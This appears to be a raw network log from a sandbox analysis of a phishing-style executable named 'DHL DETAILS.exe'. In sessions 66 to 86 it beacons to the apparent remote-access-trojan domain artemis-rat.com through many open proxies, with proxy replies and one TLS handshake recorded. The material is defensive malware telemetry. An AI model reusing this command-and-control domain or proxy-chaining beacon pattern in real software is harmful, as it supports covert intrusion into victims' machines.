                                                                                    Mar 9, 2024 13:14:12.557514906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    66192.168.2.550170104.25.230.252806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.562206030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.716581106 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    67192.168.2.550177104.19.225.70806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.567740917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.722173929 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    68192.168.2.550178172.67.181.136806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.568594933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.722624063 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    69192.168.2.549987103.49.114.19580806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.575509071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    70192.168.2.550131154.205.152.9631286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.582153082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.792773962 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    71192.168.2.549834117.160.250.13488996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.584588051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.280531883 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    72192.168.2.550056128.140.26.12806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.590816975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    73192.168.2.55016452.13.248.2931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.592410088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.165096045 CET65INHTTP/1.1 200 Connection Established
                                                                                    Content-Type: text/plain


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    74192.168.2.550201104.20.233.70806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.593405008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.747976065 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    75192.168.2.55021145.12.31.3806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.600876093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.755474091 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    76192.168.2.550215185.162.230.201806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.604696989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.758888960 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    77192.168.2.550222104.22.1.113806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.611856937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.766369104 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    78192.168.2.54978942.61.48.21980006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.616074085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.850492001 CET74INHTTP/1.1 200 OK
                                                                                    date: Sat, 09 Mar 2024 11:54:08 GMT
                                                                                    server: svcproxy


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    79192.168.2.550227104.18.220.95806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.617805958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.772464037 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    80192.168.2.55008246.17.63.16694806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.623631954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.940139055 CET339INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/4.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 5
                                                                                    X-Squid-Error: TCP_RESET 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from proxy.wakoopa.com
                                                                                    Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 72 65 73 65 74
                                                                                    Data Ascii: reset


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    81192.168.2.55008052.16.232.16431286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.628200054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.927315950 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    82192.168.2.550224162.253.68.9741456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.661194086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    83192.168.2.550154177.234.244.174322136352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.667577028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.286231995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    84192.168.2.55017452.196.1.182806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.674741983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.936184883 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:12.937105894 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 93 fb af 0b e8 1a e5 75 ba bc a6 fe 20 cf 82 bb 80 67 c5 c8 3a a4 f4 ab 0f c1 a1 77 72 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eRu g:wr*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:13.203269005 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 c8 be af 09 9e 23 71 8a 94 35 12 27 0a 92 85 13 3c 1a db 37 ac ea b3 47 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9#q5'<7GDOWNGRD0000*H010Uartemis-rat.com0240309120120Z260309120120Z010Uartemis-rat.com0"0*H0LU,m-YLa
                                                                                    Mar 9, 2024 13:14:13.204936028 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 1a a4 19 b5 9c 5b 64 ae 9b ce c2 91 23 b1 1a 73 26 49 b1 d7 1d a1 67 ab 67 15 02 a9 85 68 8f 77 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 e5 eb 43 a7 2f e5 99 51 2b 43 95 8b be 81 02 c9 09 c1 12 42 1f
                                                                                    Data Ascii: %! [d#s&Igghw(C/Q+CBUWcVn
                                                                                    Mar 9, 2024 13:14:13.465270996 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 91 e0 5b 13 c9 8e 6e e1 76 b3 56 a6 b0 11 09 d0 d9 2a 68 0f f2 d3 39 13 e1 f3 7b 71 77 62 5e 3c 98 37 12 90 f6 9b 46 69
                                                                                    Data Ascii: ([nvV*h9{qwb^<7Fi


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    85192.168.2.550046103.163.51.254806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.680258989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.086532116 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    86192.168.2.550019102.132.201.202806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.680629969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.155966997 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
